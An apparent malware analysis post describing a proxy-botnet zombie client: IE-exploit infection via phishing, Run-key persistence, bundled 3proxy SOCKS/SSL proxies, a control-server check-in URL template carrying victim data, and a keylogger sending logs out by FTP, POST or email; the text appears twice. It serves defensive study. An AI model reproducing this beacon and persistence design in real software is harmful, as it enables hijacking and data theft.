The Client:
First off, most machines are infected by the use of phishing spam that lead to a web page infested with various IE exploits. The favorite for quite some time was the .chm bug and is still used often. BTW these guys are pretty much using modified poc code, nothing really original.
The zombie client is made up of three main parts:
The Master Program and two proxy servers. In most versions both are upx compressed.
1. On first run the master program will copy itself to %SystemRoot% and extract the proxy servers into the %SystemRoot%\system32 directory.
All the versions I've come across use modified copies of 3proxy found at http://www.security.nnov.ru/soft/3proxy
One Proxy will be a SOCKS 4/5 the other Elite SSL
2. Set itself up in the registry to run on boot
Either local machine or current user depending on RC; SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
3. It will then run the two proxy servers with random ports between 1200 and 60200 (second port is +2 of the first)
4. Every ten minutes it will then go through the motions to find the necessary data and report to the control server
First it will determine the computer has a decent connection speed by pinging:
ping.exe www.linux.org -n 1 -l 1
ping.exe www.linux.org -n 1 -l 1024
It then reports home
http://{ControlServer}/{whateverdir}/index.php?IP=%s&Port1=%u&Port2=%u&ID=%s&ver=%s&con=%s&ping1=%s&ping2=%s
IP = client IP
Port1 = the first proxy's port: Elite SSL
Port2 = the second proxy's port: SOCKS 4/5
ID = 24 digits. still haven't quite figured out how this is determined, part of the ID is the date the client was first installed
ver = the version of the control program; they are currently up to RC19, I've been "tracking" them since RC14
con = Modem or Lan
ping1 = the response time of "ping.exe www.linux.org -n 1 -l 1"
ping2 = the response time of "ping.exe www.linux.org -n 1 -l 1024"
5. The server will then respond with a command if one is set or a blank html page. note: if you try viewing that page with a standard web browser you will either be redirected to the front page of the site or given the message "You are not a bot"
The Master program in most RC's also extracts a keylogger/screencap trojan of some sort. The logs are sent back in various forms; ftp, POST, or by email to free russian email addresses.
First off, most machines are infected by the use of phishing spam that lead to a web page infested with various IE exploits. The favorite for quite some time was the .chm bug and is still used often. BTW these guys are pretty much using modified poc code, nothing really original.
The zombie client is made up of three main parts:
The Master Program and two proxy servers. In most versions both are upx compressed.
1. On first run the master program will copy itself to %SystemRoot% and extract the proxy servers into the %SystemRoot%\system32 directory.
All the versions I've come across use modified copies of 3proxy found at http://www.security.nnov.ru/soft/3proxy
One Proxy will be a SOCKS 4/5 the other Elite SSL
2. Set itself up in the registry to run on boot
Either local machine or current user depending on RC; SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
3. It will then run the two proxy servers with random ports between 1200 and 60200 (second port is +2 of the first)
4. Every ten minutes it will then go through the motions to find the necessary data and report to the control server
First it will determine the computer has a decent connection speed by pinging:
ping.exe www.linux.org -n 1 -l 1
ping.exe www.linux.org -n 1 -l 1024
It then reports home
http://{ControlServer}/{whateverdir}/index.php?IP=%s&Port1=%u&Port2=%u&ID=%s&ver=%s&con=%s&ping1=%s&ping2=%s
IP = client IP
Port1 = the first proxy's port: Elite SSL
Port2 = the second proxy's port: SOCKS 4/5
ID = 24 digits. still haven't quite figured out how this is determined, part of the ID is the date the client was first installed
ver = the version of the control program; they are currently up to RC19, I've been "tracking" them since RC14
con = Modem or Lan
ping1 = the response time of "ping.exe www.linux.org -n 1 -l 1"
ping2 = the response time of "ping.exe www.linux.org -n 1 -l 1024"
5. The server will then respond with a command if one is set or a blank html page. note: if you try viewing that page with a standard web browser you will either be redirected to the front page of the site or given the message "You are not a bot"
The Master program in most RC's also extracts a keylogger/screencap trojan of some sort. The logs are sent back in various forms; ftp, POST, or by email to free russian email addresses.